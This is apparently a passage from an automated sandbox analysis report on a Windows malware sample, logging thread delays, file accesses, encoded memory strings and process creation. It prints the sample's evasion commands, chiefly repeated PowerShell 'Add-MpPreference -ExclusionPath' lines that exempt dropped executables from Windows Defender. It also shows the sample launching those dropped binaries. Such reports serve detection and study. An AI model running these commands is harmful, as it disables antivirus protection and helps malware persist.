                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599766Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599657Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599485Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599370Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599233Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599125Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 100000Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99875Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99765Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99656Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99547Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99437Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99328Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99219Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99094Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98984Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98875Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98765Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98656Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597656Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597519Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597391Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597219Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597046Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 30000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 600000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 599844
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 599702
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 3600000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598844
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598625
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598438
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598110
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597766
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597594
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597441
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596766
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596608
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596422
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 300000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596297
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596186
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596049
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595907
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595772
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595655
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595547
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595430
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595329
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595204
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 100000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99988
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99875
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99765
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99633
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99492
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99263
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99062
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98943
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98812
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98703
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98593
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593563
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593454
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593329
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593188
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593079
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592954
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592829
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592704
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592579
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592469
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592357
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592249
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592133
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592029
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591870
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591704
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591446
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591333
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\0eDO5Zbs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\0eDO5Zbs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1933676498.000000001C096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a337
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1917936559.000000001B47A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                              Source: VQdUvAQ4xO.exe, tNOtXAG6xwxcUNu9tjBa.exe.0.dr, r6Lr6XbTWt.exe.0.dr, JOajDppbSkfqSPK1G9zAbH.exe.0.drBinary or memory string: AwJAgjHO0YkTHGFSakR5
                              Source: tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1960851223.00000000125E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: w1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                              Source: tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1960851223.000000001263A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Iilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A2D.tmp" "c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeQueries volume information: C:\Users\user\Desktop\VQdUvAQ4xO.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
